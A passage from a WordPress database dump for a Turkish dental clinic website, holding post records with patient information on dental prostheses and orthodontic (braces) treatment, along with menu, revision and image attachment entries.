yapılmış bir kaplama fonksiyon açısından ve temizlenme açısından sağlıklı bir dişten farksız olmalıdır. Bu dişlerin yapımında porselen, değerli metal kombinasyonları, özel cam maddeler ve özel plastiklerden hekiminizin seçimi doğrultusunda yapılır.\r\n\r\nKöprüler ise eksik dişlerin yerine protez yapabilmek için komşu diğer dişlerden destek alınarak yapılan protezlerdir. Bu restorasyonların yapımında her iki komşu dişte aşındırmalar yapılır ve yapılan köpri tüm dişleri birbirine bağlar. Eksik dişlerin yerine köprü yapılmadığı taktirde hastanın komşu dişleri ve diğer çenedeki karşıt dişi, çekim boşluğuna doğru hareket eder. Bu nedenle bozulan diş kapanışı çürüklere ve diş kayıplarına yol açar. Kaplamada olduğu gibi diş hekiminiz tarafından destek olarak alınacak dişler şekillendirilip aynı işlemler gerçekleştirilerek yapılır. Kaplamalarınızın bakımı, rutin bakım işlemleri yanısıra boşluğa konulan parçanın alt kısmının özel Dental Pross’larla diş hekiminizin göstereceği şekilde temizlenerek yapılır.\r\n\r\n<strong>Hareketli protezler</strong>\r\n\r\n<img class=\"size-medium wp-image-6355 alignright\" src=\"http://www.ze-dent.com/wp-content/uploads/2018/07/Sabit-Protez-Tedavisi-300x235.jpg\" alt=\"\" width=\"300\" height=\"235\" />Hareketli protez, sabit protez yapılamayacak durumdaki diş kayıplarının giderilmesi amacıyla yapılan protezlerdir. Sabit protezlerden farklı olarak takıp çıkarılabilirler. Özel plastik veya metal plastik kombinasyonlarından yapılırlar. Estetiği ve fonksiyonu sağlamak amacıyla yapılır. Hareketli protez gerektiren vakalarda çok fazla diş eksikliği bulunduğundan, çiğneme fonksiyonunun yerine getirilmesi ve diğer kalan dişlerin zarar görmemesi için yapılması gerekir. Hareketli protezler, dişlerin tamamen ya da büyük çoğunluğunun kaybedildiği durumlarda yapılır.\r\n\r\nHareketli protezler, özel plastikler ve metallerin kombinasyonu veya vakaya göre sadece özel plastiklerden yapılır. Hareketli protezlerde kullanılan dişler genelde plastik dişlerden seçilir. Porselen dişler ağırlıkları ve kuvvetleri yumuşak dokulara uygun olmayan şekilde ilettiğinden ve plastikle iyi bir bağlantı sağlayamayacağından tavsiye edilmemektedir. Hareketli protezlerin bakımı için her yemekten sonra çıkarılıp fırçalanmalıdır. Günde bir kere özel temizleyici maddelerle temizlenmelidir. Bazı maddeler metal içeren protezlere zarar verebileceğinden hekime danışılmadan kullanılmamalıdır. Kullanmadığınız zamanlarda protezinizi temiz bir suyun içinde tutarak su kaybedip bozulmasına engel olabilirsiniz. Hareketli protezinizi 3 yılda bir kontrol ettirip gerekiyorsa değiştirmeniz gerekmektedir. Zamanla protez aşınıp, kırılabilir veya çene ile uyumunu kaybedebilir. Bu da çene kemiğine zarar verebilir.\r\n\r\nHareketli protezlerde ilk 1 ay çiğneme ve konuşma fonksiyonlarının yerine getirilmesi açısından alışma devresidir. Ayrıca protezin oluşturabileceği uyumsuzluklar (vuruklar) yapılacak kontrollerle giderilmelidir.\r\n\r\nBir dişin kaybı sağlığınıza birçok şekilde zarar verebilir. Kaybedilen dişin önündeki ve arkasındaki dişler bu boşluğa doğru eğilirler. Karşıt diş de çekim boşluğuna doğru uzar. Çünkü dişler temas etme eğilimindedir. Bu uzama ve eğilmeler sonucunda dişlerin dizilimi ve birbirleriyle kontakları bozulur. Bu da dişler arasında gıda artığı ve bakteri plağı birikimini artırır. Bu bölgelerin temizlenmesi zordur ve ve bu nedenlede diş çürüğü ve dişeti hastalıklarının oluşması riski artar. Tüm bu sorunlar kaybedilen dişin yerine konmasıyla önlenebilir. Ancak kayıp dişin yerine konması komşu dişlerin eğilmesi ve karşıt dişin uzamasından sonra biraz daha zor olur.\r\n\r\nTüm bu metodların avantajları ve dezavantajları vardır. Diş hekiminiz hangi yöntemin size en uygun olduğuna karar verebilmeniz için en büyük yardımcınızdır.\r\n\r\nHareketli protezlerde protezin ağızdaki doğal dişlere tutunması için kullanılan metal kancalara “Kroşe” denir. Bir çok insan ağızlarında bu metallerin görünmesinden rahatsızlık duyar. Ancak gelişen diş hekimliği teknolojisi bize bu konuda çok daha estetik bir çözüm sunmaktadır. “Hassas Tutucu”lar yada ateleskop kronlar kullanılarak dişlere tutunması sağlanırken metal kroşe görüntüsünün estetiği bozması da önlenir.\r\n\r\n<strong>Hassas Tutucular</strong>\r\nHareketli protezlerde ‘kroşe’ olarak adlandırılan ve protezin tutuculuğunu sağlamak için kullanılan metal parçaların yerine kullanılan sisteme ‘hassas tutucu’ denir. Dişsiz bölgenin önündeki dişler kaplamadaki gibi işlemlerden geçirilerek hassas tutucuların sabit parçası bu dişlere yapılan kaplamaya sabit olacak şekilde döküm olarak yapılır. Hareketli parçada yapılacak olan hareketli protezde yer alır. Kroşeler dışında hareketli parça, hareketli protezde tarif edildiği şekilde yapılır. Hassas tutucular, estetik ve tutuculuğun daha iyi olması, kroşelerin yol açabileceği yiyecek birikimleri sonucu ortaya çıkacak çürük ve diğer problemlerin oluşmaması açısından daha çok tercih edilirler.[/vc_column_text][/vc_column][/vc_row]', 'Protez Tedavisi', '', 'inherit', 'closed', 'closed', '', '6353-revision-v1', '', '', '2018-07-13 18:23:30', '2018-07-13 15:23:30', '', 6353, 'http://www.ze-dent.com/6353-revision-v1/', 0, 'revision', '', 0),
(6358, 1, '2018-07-13 18:24:13', '2018-07-13 15:24:13', ' ', '', '', 'publish', 'closed', 'closed', '', '6358', '', '', '2018-07-18 20:47:08', '2018-07-18 17:47:08', '', 0, 'http://www.ze-dent.com/?p=6358', 19, 'nav_menu_item', '', 0),
(6359, 1, '2018-07-13 18:26:14', '2018-07-13 15:26:14', '[vc_row][vc_column][us_grid post_type=\"us_portfolio\" columns=\"4\" items_gap=\"4px\" items_quantity=\"\" items_layout=\"6226\"][/vc_column][/vc_row]', 'Hizmetlerimiz', '', 'inherit', 'closed', 'closed', '', '2253-autosave-v1', '', '', '2018-07-13 18:26:14', '2018-07-13 15:26:14', '', 2253, 'http://www.ze-dent.com/2253-autosave-v1/', 0, 'revision', '', 0),
(6360, 1, '2018-07-13 18:26:34', '2018-07-13 15:26:34', '[vc_row][vc_column][us_grid post_type=\"us_portfolio\" columns=\"4\" items_gap=\"4px\" items_quantity=\"\" items_layout=\"6226\"][/vc_column][/vc_row]', 'Hizmetlerimiz', '', 'inherit', 'closed', 'closed', '', '2253-revision-v1', '', '', '2018-07-13 18:26:34', '2018-07-13 15:26:34', '', 2253, 'http://www.ze-dent.com/2253-revision-v1/', 0, 'revision', '', 0),
(6362, 1, '2018-07-16 13:00:25', '2018-07-16 10:00:25', '', 'dis-teli', '', 'inherit', 'closed', 'closed', '', 'dis-teli', '', '', '2018-07-16 13:00:25', '2018-07-16 10:00:25', '', 0, 'http://www.ze-dent.com/wp-content/uploads/2018/07/dis-teli.jpg', 0, 'attachment', 'image/jpeg', 0),
(6365, 1, '2018-07-16 13:05:57', '2018-07-16 10:05:57', '', 'pedodonti', '', 'inherit', 'closed', 'closed', '', 'pedodonti', '', '', '2018-07-16 13:05:57', '2018-07-16 10:05:57', '', 0, 'http://www.ze-dent.com/wp-content/uploads/2018/07/pedodonti.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `zdenl_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(6367, 1, '2018-07-16 13:10:51', '2018-07-16 10:10:51', '[vc_row][vc_column][vc_column_text]<strong>Ortodonti (Diş Teli Tedavisi)</strong>\r\n\r\nOrtodonti, çapraşık dişlerin, hareketli veya sabit aygıtlar kullanılarak ideal bir diş dizisi haline getirilmesi, aynı zamanda iskeletsel bozuklukların, büyüme yönlendirmesi yapılarak düzeltilmesi ile ilgilenen diş hekimliği dalıdır. Ortodontik tedavinin temeli, dişlerin uygun kuvvetler uygulanarak kemik içinde hareket ettirilmesi, gerekirse yumuşak dokuların ve kemik yapılarının büyüme yönlendirmesi yoluyla ideal ilişkilerinin sağlanması esasına dayanır. Ortodontik tedavi sırasında, dişlerin bütünlüğü bozulmaz; kaplama, dolgu gibi işlemler yapılmaz. Bu yönüyle tamamen doğal ve uzun vadeli bir tedavi şeklidir.\r\n\r\nOrtodontik tedavi, halk arasında ‘diş teli’ ya da ‘damaklık’ olarak adlandırılan aygıtlarla yapılır. Bu aygıtlar sabit ya da takıp çıkartılır biçimde olabilir. Sabit ya da hareketli apareyler, porselen, metal, dişin iç yüzüne takılan, ağız dışından destek alan çeşitleri olmak üzere birçok kombinasyonda kullanılabilir.\r\n<ul>\r\n 	<li>Dişlerinizin görünüşünden memnun değilseniz,</li>\r\n 	<li>Dişleriniz sağlam olmasına rağmen çapraşıklıklar kötü bir görünüme sebep oluyor ve ne kadar fırçalarsanız fırçalayın yeterli hijyeni sağlayamıyorsanız,</li>\r\n 	<li>Bu durum sağlığınız açısından sorun yaratmanın yanı sıra sosyal yaşantınızı da olumsuz etkiliyorsa,</li>\r\n 	<li>Dişlerinizin düzeltilmesini istiyor, bunun yanında kalıcı ve dişlerinize zarar vermeyecek bir tedavi şekli arıyorsanız,</li>\r\n 	<li>artık daha güvenle gülmek istiyorsanız, ortodontik tedavi için iyi bir adaysınız demektir.</li>\r\n</ul>\r\n<strong>Ortodontik tedaviye başlamadan önce…</strong>\r\n\r\nOrtodontik tedavi, diğer diş tedavilerine göre çok farklı ve özel bir tedavi şeklidir. Bu tedavinin istenen sonucu verebilmesi için, öncelikle doğru bir tedavi planı yapılması, bu planın uygun şekilde ve gerekli sıklıkla takip edilmesi önemlidir.\r\n\r\nOrtodontik tedavilerin bu özel durumu nedeniyle, mutlaka ortodonti uzmanı bir dişhekimi tarafından yapılması gereklidir. Ortodonti uzmanlığı, 5 senelik dişhekimliği öğrenimi sonrasında, üniversitelerde uygulanan ve 5-6 sene kadar sürebilen doktora programları sayesinde kazanılır. Bu uzun süreç sonunda, hekim ‘Ortodonti Uzmanı’ unvanı ve doktora diploması alır.\r\n\r\nOrtodonti uzmanı seçerken, hekimin ulaşılabilir olmasına dikkat edilmelidir. Hasta ve hekim arasındaki iletişimin aksaması durumunda ortodontik tedavide kesintiler olmakta, tedavi süreleri uzamaktadır. Pek çoğumuzun daha önce duymuş olduğu, 4-5 senelik tedavi süreleri, bu iletişimsizlikten kaynaklanmaktadır. Doktorunuzun gerek mail, gerek telefon yoluyla ulaşılabilir olmasına dikkat edilmeli, doktorunuz tarafından randevu taleplerinize birkaç gün içerisinde cevap verilebilmelidir.\r\n\r\nOrtodontik tedaviye başlanmadan önce, ortodontistiniz tedavinizin genel planını ve maliyetini size bildirecektir. Diş tellerinizin takılmasından önce, ağız bakımınızın tamamlanması, ağızdaki tüm dolgu, dişeti sorunları, gömülü dişler gibi sorunların tedavi edilmiş olması gerekmektedir. Ortodontistiniz, genel dişhekimi ve diğer uzman hekimlerle birlikte tedavi planınızı çizecek ve tedavinize başlayacaktır.\r\n\r\n<strong>Ortodontik tedavide yaş faktörü</strong>\r\n\r\nAmerikan Ortodonti Derneği’nin önerisi, tüm çocukların, 6-7 yaşlarında ortodonti uzmanı tarafından kontrol edilmesi yönündedir. Bu aşamada, ileride ortaya çıkabilecek sorunlar teşhis edilmiş olur. Ortodontik sorunlar, çok acil değilse, tüm daimi dişlerin sürmesine kadar ertelenebilir. Bunun amacı, çocukların, kullanılan apareyleri daha kolay tolere edebilmesi ve temizliklerini yapabilmesini sağlamaktır. Alt veya üst çenenin çok önde olması veya alt ve üst dişlerin birbirlerini örtmemesi gibi iskeletsel bozuklukların işin içine katıldığı durumlarda ise tedaviye çocukluk çağında başlamak, tedavinin verimliliği ve kalıcılığı açısından çok önemlidir. İskeletsel bozukluklar zamanında tedavi edilmezse, daha sonra ancak cerrahi yöntemlerle düzeltilebilecek sorunlara yol açabilir.\r\n\r\nErişkin yaşta tedavi olmak isteyen hastalarda yaş artık bir faktör değildir. İskeletsel bozuklukların bulunmadığı ve sadece dişlerin konumlarından kaynaklanan sorunlar, her yaşta düzeltilebilir. Bu bozukluklar dişlerin braketler aracılığı ile istenen konumlarına taşınması ile çözülür. Ortodontik bozukluklara iskeletsel sorunlar da eşlik ediyorsa ve hastanın çenelerindeki bozukluklar dışarıdan da belli oluyorsa, hastada ortognatik cerrahi uygulanabilir.\r\n\r\n<strong>Çocuk Ortodontisi</strong>\r\n\r\nOrtodontik tedavilerin büyük çoğunluğu, süt dişlerindeki çürükler sebebiyle dişlerin erken kaybı sonucu oluşur. Erken çekilen süt dişleri, daimi dişlerin yerleşmesi için gerekli olan yerin kaybedilmesine ve dolayısı ile sürmekte olan daimi dişin ağızda yer bulamamasına sebep olacaktır.\r\n\r\nBazı durumlarda, süt dişlerinde çapraşıklıklar olmasa dahi, daimi dişlenmeye geçerken kalıtımsal sebepli iskeletsel ve dişsel bozukluklar oluşabilir. İskeletsel bozuklukların oluşmasında, parmak ve emzik emme gibi kötü alışkanlıkların da etkisi vardır. Bu alışkanlıkların erken yaşta bırakılması, bu bozuklukların ilerlemesini durdurur, bazen de düzeltebilir. Burun solunumunun engellendiği bazı durumlarda da (bademcik ve geniz eti varlığı gibi durumlar) iskeletsel sorunlar oluşabilmektedir. Bu gibi sorunların erken tanısı ve tedavisi amacıyla, her çocuğun ortodontik muayeneden geçmesi gereklidir.\r\n\r\n<strong>Ebeveynlerin ortodontik takibi</strong>\r\n\r\nÇocuk 6-8 aylık olduğunda ilk süt dişleri sürmeye başlar ve 3 yaşına kadar diş sürmesi devam eder. 3-6 yaş arasında stabil kalan diş dizisi, 6-7 yaşlarında önde keser dişlerin ve en arkada 6 yaş dişleri sürmeleri ile değişmeye başlar. Genel olarak süt dişlenme safhasında sorunlar görülmezse de anne ve babalar özellikle çıkmayan veya yanlış doğrultuda süren süt dişlerine dikkat etmelidirler.\r\nDaimi dişlenmeye geçiş aşamasında ise dikkat edilmesi gereken durumlar şunlardır:\r\n<ul>\r\n 	<li>Süt dişlerinin erken kaybı,</li>\r\n 	<li>Üst keser dişlerin çok önde veya arkada sürmeleri,</li>\r\n 	<li>Yeni süren daimi dişlerde renk ve şekil bozuklukları,</li>\r\n 	<li>Süt dişlerinin zamanında düşememesi sonucu daimi diş sürmelerinin gecikmesi,</li>\r\n 	<li>6 yaşında süren birinci büyük azı dişlerindeki çürükler,</li>\r\n 	<li>Üst çenenin dar olması sonucu alt çeneyi örtmemesi,</li>\r\n 	<li>Alt ve üst ön dişlerin birbirlerini örtmemesi,</li>\r\n 	<li>Parmak veya emzik emme gibi çeşitli kötü alışkanlıkların varlığı.</li>\r\n 	<li>Alt ve üst ön dişlerin birbirlerini örtmemesi</li>\r\n</ul>\r\n<strong>Süt dişlerinin önemi</strong>\r\n\r\nSüt dişlerindeki çürüklerin dişlerinin zamanından önce çekilmesinin; ortodontik bozukluklara, daimi dişlerin çene kemiği içerisinde gömük kalmasına neden olduğu kanıtlanmış bir gerçektir.\r\n\r\nSüt dişleri, doğumdan sonraki 6. aydan itibaren belirli bir sırayla sürmeye başlarlar ve yaklaşık 2,5 yaşındaki bir çocukta tüm süt dişleri sürmüş olur. Alt ve üst çenede toplam 20 tane süt dişi, 6 yaşına kadar ağızda kalmaya devam eder. Bu dönemden 12 yaşına kadar tüm süt dişleri, sırayla yerlerini daimi dişlere bırakır. Bu değişim döneminde süt dişlerinde oluşan büyük çürükler ve erken süt dişi kayıpları, daha arkada bulunan dişlerin bu boşluklara doğru hareketi sonucu çapraşıklıklara ve daimi dişlerin süremeyerek gömük kalmalarına neden olabilir. Bu nedenle, süt dişlerinin sağlıklı bir şekilde ağızda kalmaları oldukça önemlidir.\r\n\r\nOrtodontik bozuklukların oluşumunda süt dişlenme dönemindeki durumlar, tek başına sorumlu değildir. Ortodontik sorunlar, genetik olarak da anne-baba veya daha büyük aile üyelerinden çocuklara geçebilmektedir. Bunun dışında, bebeklik döneminde anne sütüyle yetersiz beslenerek veya biberon ve yalancı emzik kullanımına yönelik yapılan yanlışlıklar; çocukluk dönemindeki parmak emme, dudak emme, dil itimi ve ağızdan solunum gibi kötü alışkanlıklar da ortodontik sorunlara yol açabilmektedir.\r\n\r\n<strong>Tedavide kullanılan aygıtlar</strong>\r\n\r\nOrtodontik tedavinin temel prensibi, önce sebebin ortadan kaldırılması, daha sonra oluşmuş bozukluğun düzeltilmesidir. Dişsel ve iskelesel bozukluklar, parmak emme veya ağız solunumu gibi nedenlerle oluşmuşsa, bu alışkanlıkların devamını engelleyecek hareketli veya sabit aygıtlar kullanılır. Bu davranışların büyüme çağında durdurulması, dişsel ve iskeletsel sorunları durdurur, hatta düzelmesini sağlar.\r\n\r\n<strong>Genel olarak iki tip aygıt vardır:</strong>\r\n\r\nHareketli aygıtlar, genelde birkaç dişi içeren basit bozuklukların düzeltilmesinde kullanılırlar. Bu aygıtların, dişleri itmeye yarayan yayları veya çeneyi genişletmeye yarayan vidaları bulunabilir. Bu aygıtlar genelde birkaç ay kullanılabilirler.\r\n\r\nSabit aygıtlar, yani braketler, dişlerin üzerine yapıştırılırlar ve genelde daha zor tedavilerde kullanılırlar. Braketler, metal renginde olabileceği gibi, erişkin hastaların kullanımına yönelik olarak diş renginde de üretilmiş olan çeşitleri vardır. Porselen braketler genellikle erişkin hastalarda kullanılırlar. Bu braketler, en küçük renklenmeyi bile belli ettikleri için, ağız bakımına çok daha fazla özen gösterilmelidir.\r\n\r\nÇocuklarda büyüme çağında, iskeletsel bozuklukların düzeltilmesinde, bazı durumlarda ağız dışındaki bölgelerden de destek almak gerekebilir. Alt çenenin önde olduğu durumlarda çenelikler, üst çenenin önde olduğu durumlarda üst çeneyi geriye çekmek amacıyla enselikler kullanılabilir. Bu aygıtlar, genellikle günde 14-16 saat arasında kullanılsa da, doktorunuz çocuğunuza özel kullanım süreleri belirleyecektir.\r\n\r\nOrtodontik tedavinin etkin ve hızlı biçimde yapılabilmesi için, hasta katılımı da çok önemlidir. Ortodonti, hasta, hekim ve anne-baba arasında oynanan bir takım oyunudur. Hastaların hareketli aygıtlarını ve ağız içi elastiklerini anlatıldığı şekilde ve istenen sürede takmaları, ağız hijyenlerini üst seviyede tutmaları çok önemlidir.\r\n\r\n<strong>Ortodontik tedavinin gündelik yaşam üzerindeki etkisi</strong>\r\n\r\nOrtodontik tedavi, çocukluk çağında yaygın biçimde uygulanan bir tedavidir. Çocuk, ortodontik tedavi sırasında küçük kısıtlamalar dışında her şeyi yapabilir. Spor faaliyetlerine katılabilir, şarkı söyleyebilir ve müzik aletleri çalabilir. Ortodontik tedavi çocuğun derslerini olumsuz yönde etkilemeyeceği gibi, kişiliğinin ve bedeninin gelişme aşamasında hem dış görünüşünü hem de ağız sağlığını geliştirecek, bedensel ve ruhsal sağlığının daha dengeli olmasını sağlayacaktır.\r\n\r\nTedavi sırasında en çok dikkat edilmesi gereken nokta, her yemekten sonra dişlerin doğru şekilde fırçalanmasıdır. Doktorunuz çocuğunuza ağız hijyenini nasıl sağlayacağı konusunda yardımcı olacaktır. Ortodontik tedavi sırasında diş fırçalama alışkanlığının yerleşmesi, ömür boyu sürecek ağız ve diş sağlığının garantisidir.\r\n\r\nSabit aygıtların zarar görmemesi, tedavinin etkinliği açısından çok önemlidir. Sert gıdaların ısırılması tellere zarar verebilir. Bunu engellemek için, çekirdekli meyveleri ve cips, kraker gibi yiyecekleri daha dikkatli yemek, braketlere yapışabilecek besinleri çok sık tüketmemek yeterli olacaktır.\r\n\r\nTedavinin başlangıç safhasında dişlerde, dişetlerinde ve yanaklarda geçici bir süre çeşitli rahatsızlıklar olabilir. Bu durum, ortodontik aygıtlara alışma sürecinin doğal bir sonucudur. 2-3 gün sürebilen bu hafif rahatsızlık, tedavinin geri kalan sürecinde görülmeyecektir.\r\n\r\n<strong>Tedavinin süresi</strong>\r\n\r\nSadece dişleri ilgilendiren basit çapraşıklıklar, 6ay-1 sene arasında değişebilen tedavi süresine ihtiyaç duyarlar. Bu süre her hastada farklı olmakla beraber, yapılacak tedavinin tipine, kullanılan aygıtların türüne ve yaş, cinsiyet gibi bireysel faktörlere bağlıdır. Diş çapraşıklıklarının düzeltilmesi amacıyla, bazı durumlarda diş çekimi yapmak gerekebilir. Bu durumda tedavi süresi genellikle 18-24 ay arasında olabilir.\r\n\r\nErken teşhis edilen ve tedavisine çocukluk çağında başlanması gereken bazı iskeletsel sorunlarda ise, tedavi daha uzun sürebilmekte, bununla birlikte yapılan tedavinin yoğunluğu azaltılmaktadır. Tedaviniz sırasında, ortalama olarak 4-6 haftada bir ortodontistinizi ziyaret etmeniz gerekecektir. Bu süre, tedavi sürecinize göre değişebilir.\r\n\r\n<strong>Erişkin ortodontisi</strong>\r\n\r\nSağlıklı, düzgün dişler ve güzel bir gülümseme, kişinin kendisini doğru ifade edebilmesi için ilk ve en önemli basamaktır. Çapraşıklar ve düzensiz görünümlü dişler, hem estetik olarak kötü bir görünüme neden olurlar, hem de ağız sağlığı ve genel sağlığın bozulmasına sebep olurlar.\r\n\r\nÇocukluk çağında, gerekli olan ortodontik tedaviler maddi sorunlar yüzünden yapılamamış olabilir. Bazen de düzgün olan dişler, çekimler ve diş eti sorunları sebebiyle sonradan bozulabilir. Kaybedilen dişler, geride kalan dişlerin diş boşluğuna doğru hareket etmesine sebep olarak, dişlerin aralanmasına veya bir tarafa doğru eğilmesine sebep olabilir. Alt ve üst dişlerin düzgün olarak kapanmaması durumunda, estetik sorunlar dışında, çene ekleminde düzensizlikler, ağrılar ve çenenin açılamamasına kadar gidebilen sorunlar başlayabilir. Dişlerdeki çapraşıklıklar diş sağlığını ve genel sağlığı olumsuz yönde etkilemekle kalmaz, aynı zamanda bireyin kendini toplumda geri planda kalmış ve mutsuz hissetmesine sebep olur.\r\n\r\nGeçmiş yıllarda, dişsel bozuklukların düzeltilmesi amacıyla, porselen kaplamalar kullanılmaktaydı. Günümüzde ise, gelişen tedavi teknikleri ve malzeme teknolojisi sayesinde, artık erişkin kişilerin de ortodontik tedaviden faydalanmaları mümkün olmuştur. Kullanılacak estetik braketler ve teller sayesinde çevredeki insanlar fark etmeden ortodontik tedavi devam edecektir.\r\n\r\nBirey, ortodontik tedavi sırasında küçük kısıtlamalar dışında her şeyi yapmakta özgürdür. İş ve sosyal hayatına devam edebilir, her türlü spor faaliyetine katılabilir. Braketler, konuşmak, şarkı söylemek ya da müzik aleti çalmak gibi aktiviteleri kısıtlamayacaktır.\r\n\r\n<strong>Tedavi sırasında dikkat edilmesi gerekenler</strong>\r\n\r\nOrtodontik tedavinizin başlarında, bazı rahatsızlıklar hissetmeniz normaldir. Dişleriniz ve ağız dokularınız braketlerinize birkaç gün içinde alışacaktır. Doktorunuz, tedavi başındaki sıkıntılarınızın azalmasına yönelik tedbirler alacaktır.\r\n\r\nTedaviniz sırasında uymanız gereken en önemli kural, diş ve dişeti sağlığınızı korumak amacıyla, ağız hijyeninizi en üst seviyede tutmaktır. Bu amaçla ortodontistiniz size uygun fırçalama tekniklerini anlatacaktır. Dişlerinizi, her yemekten sonra fırçalamanız gerekmektedir. Tedaviniz sırasında ve sonrasında, diş ipi kullanmanız ara yüz çürüklerinin engellenmesini sağlayacaktır.\r\n\r\nTellerinizin zarar görmemesi için, sert ve yapışkan gıdalardan uzak durmalısınız. Zeytin, erik gibi çekirdekli gıdalar, kuruyemişler, sert çikolatalar, dişlerinize ve tellerinize zarar verebilir.\r\n\r\n<strong>Tedavi süresi</strong>\r\n\r\nGelişen tedavi teknikleri sayesinde, erişkin yaşta da hızlı ve etkili tedaviler uygulamak mümkün olmuştur. Sadece dişleri ilgilendiren basit çapraşıklıklar, 12-24 ay arasında değişebilen tedavi süresine ihtiyaç duyarlar. Bu süre her hastada farklı olmakla beraber, yapılacak tedavinin tipine, kullanılan aygıtların türüne ve yaş, cinsiyet gibi bireysel faktörlere bağlıdır.\r\n\r\nOrtodontik tedavi süresince, randevular genelde 4-6 hafta arasında olacaktır. Bu süre, tedavi gereksinimlerinize göre değişiklikler gösterebilir. Tedavi süresince karşılaşabileceğiniz her türlü sorunda, ortodontistinize danışabilirsiniz.\r\n\r\n<strong>Lingual Ortodonti</strong>\r\n\r\nGünümüzde gelişmekte olan bir başka tedavi şekli de, braketlerin, dişlerin iç yüzeylerine yapıştırıldığı “Lingual Ortodonti” dir. Lingual ortodontide kullanılan özel braket ve teller dişlerin görünür yüzeyleri yerine iç yüzeylerine yapıştırılmakta ve bu sayede tedavi görmekte olduğunuzu sizin ve doktorunuzun dışında kimse fark etmemektedir. Lingual ortodontik tedavi tekniğinin, kendisine has bazı kısıtlamaları, avantaj ve dezavantajları bulunmaktadır. Ortodontistiniz, muayenenizden sonra sizi bu konuda bilgilendirecektir. Ortodontideki yenilikler bununla sınırlı değildir. lütfen tıklayınız…[/vc_column_text][/vc_column][/vc_row]', 'Ortodonti / Diş Teli Tedavisi', '', 'publish', 'closed', 'closed', '', 'ortodonti-dis-teli-tedavisi', '', '', '2018-07-16 13:10:51', '2018-07-16 10:10:51', '', 0, 'http://www.ze-dent.com/?post_type=us_portfolio&#038;p=6367', 0, 'us_portfolio', '', 0),
(6368, 1, '2018-07-16 13:10:51', '2018-07-16 10:10:51', '[vc_row][vc_column][vc_column_text]<strong>Ortodonti (Diş Teli Tedavisi)</strong>\r\n\r\nOrtodonti, çapraşık dişlerin, hareketli veya sabit aygıtlar kullanılarak ideal bir diş dizisi haline getirilmesi, aynı zamanda iskeletsel bozuklukların, büyüme yönlendirmesi yapılarak düzeltilmesi ile ilgilenen diş hekimliği dalıdır. Ortodontik tedavinin temeli, dişlerin uygun kuvvetler uygulanarak kemik içinde hareket ettirilmesi, gerekirse yumuşak dokuların ve kemik yapılarının büyüme yönlendirmesi yoluyla ideal ilişkilerinin sağlanması esasına dayanır. Ortodontik tedavi sırasında, dişlerin bütünlüğü bozulmaz; kaplama, dolgu gibi işlemler yapılmaz. Bu yönüyle tamamen doğal ve uzun vadeli bir tedavi şeklidir.\r\n\r\nOrtodontik tedavi, halk arasında ‘diş teli’ ya da ‘damaklık’ olarak adlandırılan aygıtlarla yapılır. Bu aygıtlar sabit ya da takıp çıkartılır biçimde olabilir. Sabit ya da hareketli apareyler, porselen, metal, dişin iç yüzüne takılan, ağız dışından destek alan çeşitleri olmak üzere birçok kombinasyonda kullanılabilir.\r\n<ul>\r\n 	<li>Dişlerinizin görünüşünden memnun değilseniz,</li>\r\n 	<li>Dişleriniz sağlam olmasına rağmen çapraşıklıklar kötü bir görünüme sebep oluyor ve ne kadar fırçalarsanız fırçalayın yeterli hijyeni sağlayamıyorsanız,</li>\r\n 	<li>Bu durum sağlığınız açısından sorun yaratmanın yanı sıra sosyal yaşantınızı da olumsuz etkiliyorsa,</li>\r\n 	<li>Dişlerinizin düzeltilmesini istiyor, bunun yanında kalıcı ve dişlerinize zarar vermeyecek bir tedavi şekli arıyorsanız,</li>\r\n 	<li>artık daha güvenle gülmek istiyorsanız, ortodontik tedavi için iyi bir adaysınız demektir.</li>\r\n</ul>\r\n<strong>Ortodontik tedaviye başlamadan önce…</strong>\r\n\r\nOrtodontik tedavi, diğer diş tedavilerine göre çok farklı ve özel bir tedavi şeklidir. Bu tedavinin istenen sonucu verebilmesi için, öncelikle doğru bir tedavi planı yapılması, bu planın uygun şekilde ve gerekli sıklıkla takip edilmesi önemlidir.\r\n\r\nOrtodontik tedavilerin bu özel durumu nedeniyle, mutlaka ortodonti uzmanı bir dişhekimi tarafından yapılması gereklidir. Ortodonti uzmanlığı, 5 senelik dişhekimliği öğrenimi sonrasında, üniversitelerde uygulanan ve 5-6 sene kadar sürebilen doktora programları sayesinde kazanılır. Bu uzun süreç sonunda, hekim ‘Ortodonti Uzmanı’ unvanı ve doktora diploması alır.\r\n\r\nOrtodonti uzmanı seçerken, hekimin ulaşılabilir olmasına dikkat edilmelidir. Hasta ve hekim arasındaki iletişimin aksaması durumunda ortodontik tedavide kesintiler olmakta, tedavi süreleri uzamaktadır. Pek çoğumuzun daha önce duymuş olduğu, 4-5 senelik tedavi süreleri, bu iletişimsizlikten kaynaklanmaktadır. Doktorunuzun gerek mail, gerek telefon yoluyla ulaşılabilir olmasına dikkat edilmeli, doktorunuz tarafından randevu taleplerinize birkaç gün içerisinde cevap verilebilmelidir.\r\n\r\nOrtodontik tedaviye başlanmadan önce, ortodontistiniz tedavinizin genel planını ve maliyetini size bildirecektir. Diş tellerinizin takılmasından önce, ağız bakımınızın tamamlanması, ağızdaki tüm dolgu, dişeti sorunları, gömülü dişler gibi sorunların tedavi edilmiş olması gerekmektedir. Ortodontistiniz, genel dişhekimi ve diğer uzman hekimlerle birlikte tedavi planınızı çizecek ve tedavinize başlayacaktır.\r\n\r\n<strong>Ortodontik tedavide yaş faktörü</strong>\r\n\r\nAmerikan Ortodonti Derneği’nin önerisi, tüm çocukların, 6-7 yaşlarında ortodonti uzmanı tarafından kontrol edilmesi yönündedir. Bu aşamada, ileride ortaya çıkabilecek sorunlar teşhis edilmiş olur. Ortodontik sorunlar, çok acil değilse, tüm daimi dişlerin sürmesine kadar ertelenebilir. Bunun amacı, çocukların, kullanılan apareyleri daha kolay tolere edebilmesi ve temizliklerini yapabilmesini sağlamaktır. Alt veya üst çenenin çok önde olması veya alt ve üst dişlerin birbirlerini örtmemesi gibi iskeletsel bozuklukların işin içine katıldığı durumlarda ise tedaviye çocukluk çağında başlamak, tedavinin verimliliği ve kalıcılığı açısından çok önemlidir. İskeletsel bozukluklar zamanında tedavi edilmezse, daha sonra ancak cerrahi yöntemlerle düzeltilebilecek sorunlara yol açabilir.\r\n\r\nErişkin yaşta tedavi olmak isteyen 